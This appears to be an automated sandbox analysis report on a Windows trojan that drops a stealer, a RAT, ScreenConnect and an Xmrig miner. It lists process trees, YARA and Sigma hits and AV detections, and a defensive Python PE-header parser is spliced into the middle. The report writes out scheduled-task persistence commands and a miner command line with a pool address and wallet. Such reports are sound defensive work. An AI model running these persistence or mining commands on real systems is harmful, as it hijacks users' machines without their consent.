Windows Analysis Report
RPHbzz3JqY.exe

Overview

General Information

Sample name: RPHbzz3JqY.exe (renamed because original name is a hash value)
Original sample name: 848abdbd09c052799a0e0180b59f6fee.exe
Analysis ID: 1479881
MD5: 848abdbd09c052799a0e0180b59f6fee
SHA1: 2f73b04baf17c3a9f9d21f6f324d64306a10682c
SHA256: 1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109
Tags: 32, exe, trojan

Detection

ScreenConnect Tool, PureLog Stealer, RedLine, Xmrig, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to hide user accounts
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected ScreenConnect Tool
Yara signature match

Classification

  • System is w10x64
  • RPHbzz3JqY.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\RPHbzz3JqY.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
    • schtasks.exe (PID: 6684 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explert.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • explert.exe (PID: 2852 cmdline: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe MD5: 848ABDBD09C052799A0E0180B59F6FEE)
    • schtasks.exe (PID: 2004 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • IIZS2TRqf69aZbLAX3cf3edn.exe (PID: 6612 cmdline: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
      • gtxkvh.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\gtxkvh.exe" MD5: 631670BEA7DD01CB347C389294714438)
        • schtasks.exe (PID: 6892 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Cerker.exe (PID: 6420 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
      • AddInProcess.exe (PID: 6560 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
      • AddInProcess.exe (PID: 2704 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50 MD5: 929EA1AF28AFEA2A3311FD4297425C94)
    • HM3SOlbpH71yEXUIEAOeIiGX.exe (PID: 7064 cmdline: "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe" MD5: 4F5771AA008FB55801A3F9FBA7130F69)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • explert.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • explert.exe (PID: 2004 cmdline: "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" MD5: 848ABDBD09C052799A0E0180B59F6FEE)
  • sys_updater.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 2380 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • sys_updater.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe" MD5: 18BBC3FB86E902AFB59C06811A5B01F4)
  • Cerker.exe (PID: 6320 cmdline: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe MD5: 631670BEA7DD01CB347C389294714438)
  • Cerker.exe (PID: 6092 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
  • Cerker.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 631670BEA7DD01CB347C389294714438)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
RedLine Stealer | Sziabjyahisyguwsiggswiwygisig | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an infostealer use which targets browser information and cryptowallets. Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
Source | Rule | Description | Author | Strings
C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\ProgramData\yt3cew8k69RKLpgTFur2iz2M.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
(5 of 11 entries shown)

Source | Rule | Description | Author | Strings
00000018.00000003.2663527189.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
0000001B.00000003.2780772219.00000159F38CB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000018.00000003.2686476457.0000021E03768000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0xb659d:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
0000001B.00000003.2783975569.00000159F3470000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
(5 of 130 entries shown)

Source | Rule | Description | Author | Strings
10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen | (matched strings listed below)
  • 0x75421:$s1: file:///
  • 0x7537d:$s2: {11111-22222-10009-11112}
  • 0x753b1:$s3: {11111-22222-50001-00000}
  • 0x6ffb0:$s4: get_Module
  • 0x70433:$s5: Reverse
  • 0x74b24:$s6: BlockCopy
  • 0x707af:$s7: ReadByte
  • 0x75433:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(5 of 28 entries shown)

                            Bitcoin Miner

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe", ParentImage: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, ParentProcessId: 6612, ParentProcessName: IIZS2TRqf69aZbLAX3cf3edn.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50, ProcessId: 6560, ProcessName: AddInProcess.exe

                            System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RPHbzz3JqY.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\explert.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RPHbzz3JqY.exe, ProcessId: 6488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\explert.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, ParentImage: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, ParentProcessId: 2852, ParentProcessName: explert.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, ProcessId: 2004, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RPHbzz3JqY.exe", ParentImage: C:\Users\user\Desktop\RPHbzz3JqY.exe, ParentProcessId: 6488, ParentProcessName: RPHbzz3JqY.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F, ProcessId: 6684, ProcessName: schtasks.exe
                            No Snort rule has matched

                            AV Detection

Source: RPHbzz3JqY.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Avira: detection malicious, Label: HEUR/AGEN.1310947
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | ReversingLabs: Detection: 83%
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Virustotal: Detection: 75%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | ReversingLabs: Detection: 83%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Virustotal: Detection: 74%
Source: RPHbzz3JqY.exe | ReversingLabs: Detection: 60%
Source: RPHbzz3JqY.exe | Virustotal: Detection: 56%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Joe Sandbox ML: detected
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe | Joe Sandbox ML: detected
Source: RPHbzz3JqY.exe | Joe Sandbox ML: detected

                            Bitcoin Miner

                            Source: Yara matchFile source: 00000018.00000003.2660730785.0000021E03194000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759580916.00000159F38CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2688132576.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2777007339.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759580916.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2918637105.0000020E4982A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2764697915.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2660087797.0000021E03537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2766881524.00000159F346E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2766881524.00000159F3479000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2661359746.0000021E0318E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2782280474.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2787221813.00000159F345E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2686476457.0000021E03798000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2784484927.00000159F3484000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2779479672.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2759055860.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2790709240.00000159F361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2791398929.00000159F3460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2663760300.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2970680561.0000020E4949C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2969262618.0000020E49491000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2931335674.0000020E495E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2781349798.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2662087897.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2689684395.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2918637105.0000020E497F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000018.00000003.2689532030.0000021E030A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000003.2801216518.00000159F349D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000003.2920893388.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: sys_updater.exe PID: 5928, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sys_updater.exe PID: 5232, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: sys_updater.exe PID: 2380, type: MEMORYSTR
                            Source: RPHbzz3JqY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: RPHbzz3JqY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
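The two "Static PE information" rows above are the decoded IMAGE_FILE_HEADER.Characteristics and IMAGE_OPTIONAL_HEADER.DllCharacteristics bits of the submitted sample. The following script is an added example (not part of the Joe Sandbox report) that reproduces that decoding from raw bytes and flags the mitigations that are absent; DYNAMIC_BASE and NX_COMPAT are linker defaults and say nothing about intent, so the useful triage signal is what is missing (here GUARD_CF). The `build_sample_pe` helper constructs a headers-only PE32 blob for offline testing; it is not the sample's own bytes.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h); only the commonly triaged ones
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (winnt.h)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def _flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def pe_characteristics(data: bytes) -> dict:
    """Decode the COFF Characteristics and optional-header DllCharacteristics of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                          # the COFF file header is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    # DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "machine": machine,
        "pe32plus": magic == 0x20B,
        "characteristics": _flag_names(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": _flag_names(dll_chars, DLL_CHARACTERISTICS),
    }


def missing_mitigations(info: dict) -> list:
    """Mitigation flags expected on a modern build that this image does not set."""
    wanted = ["DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF"]
    if info["pe32plus"]:
        wanted.append("HIGH_ENTROPY_VA")   # only meaningful for 64-bit images
    return [f for f in wanted if f not in info["dll_characteristics"]]


def build_sample_pe(characteristics: int, dll_characteristics: int) -> bytes:
    """Constructed minimal PE32 header (headers only, not a runnable binary) for offline testing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))        # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 224, characteristics)  # I386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)               # PE32 magic
    struct.pack_into("<H", opt, 68, 2)                  # Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
    struct.pack_into("<H", opt, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Same flag set the report shows for RPHbzz3JqY.exe:
    # EXECUTABLE_IMAGE | 32BIT_MACHINE and DYNAMIC_BASE | NX_COMPAT | TERMINAL_SERVER_AWARE
    sample = build_sample_pe(0x0002 | 0x0100, 0x0040 | 0x0100 | 0x8000)
    info = pe_characteristics(sample)
    print(info)
    print("missing:", missing_mitigations(info))
```

Run it against a real file with `pe_characteristics(open(path, "rb").read())`; the function reads only the headers, so a full image or a headers-only dump both work.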
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbQ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb\888 source: gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe.26.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdba444 source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.000000000133A000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000008.00000000.1765448808.0000000001333000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: Pilo.pdb source: IIZS2TRqf69aZbLAX3cf3edn.exe, 00000009.00000003.2181196365.00000234D5A69000.00000004.00000020.00020000.00000000.sdmp, gtxkvh.exe, 0000001A.00000000.2318421372.0000000000F16000.00000002.00000001.01000000.0000001A.sdmp, sys_updater.exe, 0000001B.00000003.2800169129.00000159F1A4E000.00000004.00000020.00020000.00000000.sdmp, sys_updater.exe.26.dr
